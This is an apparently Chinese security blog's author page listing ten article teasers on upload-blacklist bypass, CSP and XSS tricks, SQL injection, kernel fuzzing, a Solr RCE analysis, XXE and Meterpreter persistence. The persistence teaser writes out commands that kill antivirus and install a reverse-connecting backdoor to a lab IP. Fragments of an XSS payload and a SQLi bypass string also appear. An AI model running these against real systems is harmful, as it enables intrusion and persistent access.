单纯小白

k1

0关注
2粉丝
48文章
返回网站首页

您已发布 48篇文章作品写文章

看我如何突破JFinal黑名单机制实现任意文件上传

 Author:平安银行应用安全团队-Glassy引言JFinal是国产优秀的web框架,短小精悍强大,易于使用。近期团队内一名小伙伴(LuoKe)在安全测试的时候报了一个很玄学的任意文件上传,笔者本着知其然必知其所以然的态度去跟进了一下问题代码,发现问题系统在处理上传文件功能的时候使用了JFinal框架,于是去对该框架上传文件处的代码做了一下审计,发现了JFinal上传文件的黑名单机制

 2019-8-16
 0 
 1164 

巧妙地绕过CSP:欺骗CSP执行任意代码

前言内容安全策略(Content Security Policy,CSP)是一种内置的浏览器技术,有助于防止跨站点脚本(XSS)等攻击。它列出并描述了路径和源,浏览器可以从这些路径和源安全地加载资源,这些资源可能包括图像、框架、JavaScricript等。但是,如果当所有不安全的资源来源都不被允许时,我们仍可以给出一个成功的XSS事件的例子呢?是怎么做到的呢? 当一切正常时,CSP是如

 2019-8-16
 0 
 1369 

从 XSS Payload 学习浏览器解码

前几天看了浏览器解码看XSS,没有看得很明白,又找了这篇深入理解浏览器解析机制和XSS向量编码,翻译的文章,有些地方翻译的怪怪的,需要看下原文,啃了2天终于搞明白了原文里给出了几个XSS Payload,也给出了答案和演示地址,有答案但没解析,下面一个个分析有点像上学的时候,看书看不懂,做题不会做,看答案解析做题就懂了Basics1<a href="%6a%61%76%6

 2019-8-15
 0 
 1261 

现代web服务为SQL注入提供的攻击面 随谈

序言现代化的web服务对比传统的web服务,增加了许多新的功能和特性,在这种情况下,数据库所存储的内容、与数据库交互的代码也发生了改变,同时也增加了许多攻击面。本文将结合实际情况,谈谈现代化web服务可能暴露的一些SQLi攻击面和利用手段。关于传统SQLi攻击面传统注入中,SQLi只用来做几件事:读web账号密码SELECT ... FROM admin、伪造账号密码'or'=&#

 2019-8-15
 0 
 1189 

内核漏洞挖掘技术系列(6)——使用AFL进行内核漏洞挖掘(2)

这是内核漏洞挖掘技术系列的第十三篇(本篇文章为翻译)。第一篇:内核漏洞挖掘技术系列(1)——trinity第二篇:内核漏洞挖掘技术系列(2)——bochspwn第三篇:内核漏洞挖掘技术系列(3)——bochspwn-reloaded(1)第四篇:内核漏洞挖掘技术系列(3)——bochspwn-reloaded(2)第五篇:内核漏洞挖掘技术系列(4)——syzkaller(1)第六篇:内核漏洞挖掘技

 2019-8-14
 0 
 2050 

meterpreter后渗透之权限维持

攻击机:192.168.85.130目标机win7:192.168.85.131Persistence后门使用此方法建议运行前关闭杀毒软件Run post/windows/manage/killav输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。参数解释如下:-A 自动启动一个匹配的漏洞/多/处理程序

 2019-8-14
 0 
 1375 

使用 afl-unicorn: Fuzzing 任意二进制代码

前言American Fuzzy Lop(AFL)很棒。在命令行应用程序上快速进行的模糊测试分析是最好的选择。但是,如果通过命令行访问你想要模糊的东西的情况怎么样呢?很多时候你可以编写一个测试工具(或者可能使用 libFuzzer),但如果你想要模拟你想要模糊的代码部分,并得到 AFL 的所有基于 coverage 的优点呢?例如,你可能想要从嵌入式系统中模糊解析函数,该系统通过 RF 接收输

 2019-8-13
 0 
 2149 

CVE-2019-0193 Apache Solr远程命令执行漏洞分析

概述近日,Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞(CVE-2019-0193),攻击者可利用dataConfig参数构造恶意请求,导致执行任意代码,下面简单分析一下这个漏洞。官方通告:https://issues.apache.org/jira/browse/SOLR-13669前置概念DataimportSolr支持从Dataimport导入自定义数据,da

 2019-8-13
 0 
 1455 

绕过WAF的OOB-XXE

Hello hackers,几个星期前,我发布推文称挖到了一个XML实体注入漏洞。这个漏洞的挖掘非常艰难,目标应用程序的WAF封锁了所有对外的请求,包括DNS查询。所以在这里,我向你分享这个有趣的挖洞故事。由于这是一个私人项目,不便透露站点信息,请见谅。和往常一样,我在夜里开始黑客工作。在目标站点上收集信息时,我碰到了一个参数为xml的端点,参数内容做了加密处理。进一步分析,我发现这个发往后端的X

 2019-8-12
 0 
 1807 

又双叒叕谈注入

前言继续对SQL注入进行一个总结以及学习,本文目录如下:SQL约束攻击order by后的注入insert、update、delete后的注入http分割注入desc相关问题万能密码\N问题唔,新姿势不多,望各位师傅莫怪SQL约束攻击SQL约束攻击并不是一种很新颖的攻击方式,它的成因是因为在处理SQL中的字符串时,字符串末尾的空格字符都会被删除。换句话说,“lengyi”与“lengyi ”几

 2019-8-12
 0 
 1178